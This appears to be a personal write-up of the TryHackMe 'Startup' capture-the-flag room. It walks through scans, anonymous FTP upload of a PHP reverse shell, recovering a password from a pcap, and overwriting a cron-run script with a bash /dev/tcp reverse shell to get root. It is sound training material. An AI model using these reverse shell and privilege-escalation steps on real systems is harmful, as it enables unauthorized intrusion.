///Startup///
https://tryhackme.com/room/startup

[[NMAP]]

Starting Nmap 7.80 ( https://nmap.org ) at 2022-05-16 13:35 EDT
Nmap scan report for 10.10.99.213
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel


Visiting the website gives us a Maintenance page that reads:

No spice here!

Please excuse us as we develop our site. We want to make it the most stylish and convienient way to buy peppers. Plus, we need a web developer. 
BTW if you're a web developer, contact us. Otherwise, don't you worry. We'll be online shortly!

— Dev Team

Viewing the source code of the page only provides us with a short message of "<!--when are we gonna update this??-->"

[[GOBUSTER]]

gobuster -u http://10.10.99.213 -w /home/techtyte/thm/dirbcommon.txt 

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.99.213/
[+] Threads      : 10
[+] Wordlist     : /home/techtyte/thm/dirbcommon.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2022/05/16 13:40:52 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/files (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
=====================================================
2022/05/16 13:42:38 Finished
=====================================================


/files/ has two files for us to look at:

notice.txt reads:
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! 
Now I dont know who it is, but Maya is looking pretty sus.


important.jpg asks the solemn question of: "everybody asks who's the imposter...but nobody asks hows's the imposter" ;(

There is also the directory for /ftp/ but it appears to be empty.

I tried logging in to the FTP server using anyonymous login to see if there was anything else there:

ftp 10.10.99.213
Connected to 10.10.99.213.
220 (vsFTPd 3.0.3)
Name (10.10.99.213:techtyte): anonymous
331 Please specify the password. 
Password:    <---- Just press enter here
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
226 Directory send OK.

It looks like we have write access to the /ftp/ directory.
Let's upload a php reverse shell here (I used the one from pentestmonkey)

ftp> put phpshell.php
local: phpshell.php remote: phpshell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5493 bytes sent in 0.05 secs (101.3999 kB/s)
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxr-x    1 112      118          5493 May 16 18:09 phpshell.php
226 Directory send OK.

Set up a listener: nc -lvnp [whatever port]

Once that is going, go back to /files/ftp/, and you'll see your shell. Click it

Listening on 0.0.0.0 1111
Connection received on 10.10.99.213 44936
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 18:10:40 up  1:04,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ 

--For the recipe question, look for recipe.txt in the / directory--

I found a pcap file under "incidents", and copied it to the ftp folder so I could analyze it:

cp suspicious.pcapng /var/www/html/files/ftp/

It looks like someone else has uploaded a shell to the ftp directory, named shell.php. Following the HTML stream, we see:

WARNING: Failed to daemonise.  This is quite common and not fatal.
Successfully opened reverse shell to 192.168.22.139:4444
ERROR: Shell process terminated

Next, let's check traffic on port 4444 with filter tcp.port == 4444
And look through their activity, which include upgrading the shell with python, tried accessing user lennie's folder, and looking for sudo permissions with sudo -l to which they tried this password and failed: 

[[xx real password is here xx]]

They then looked at /etc/passwd and exited.

Even though they could not get that password to work with sudo, it does turn out to be lennie's password:

su lennie

There are a few notes in his Documents folder:
cat concern.txt
I got banned from your library for moving the "C programming language" book into the horror section. Is there a way I can appeal? --Lennie

cat list.txt
Shoppinglist: Cyberpunk 2077 | Milk | Dog food

cat note.txt
Reminders: Talk to Inclinant about our lacking security, hire a web developer, delete incident logs.

In /scripts/:

planner.sh and startup_list.txt

cat planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

However, it appears we cannot modify this to do something like a reverse shell. Let's check out what print.sh is:

lennie@startup:/etc$ cat print.sh
#!/bin/bash
echo "Done!"
lennie@startup:/etc$ ls -la print.sh
-rwx------ 1 lennie lennie 25 Nov 12  2020 print.sh

We can write to this one.

Replace the contents using nano with:
#!/bin/bash
/bin/bash -c 'bash -i >& /dev/tcp/[your tun0 address]/[port] 0>&1'

Set up another listener (nc -lvnp [port number])

nc -lvnp 1111
Listening on 0.0.0.0 1111
Connection received on 10.10.99.213 44980
bash: cannot set terminal process group (2631): Inappropriate ioctl for device
bash: no job control in this shell
root@startup:~# ls
ls
root.txt
root@startup:~# cat root.txt
cat root.txt

Congrats!!
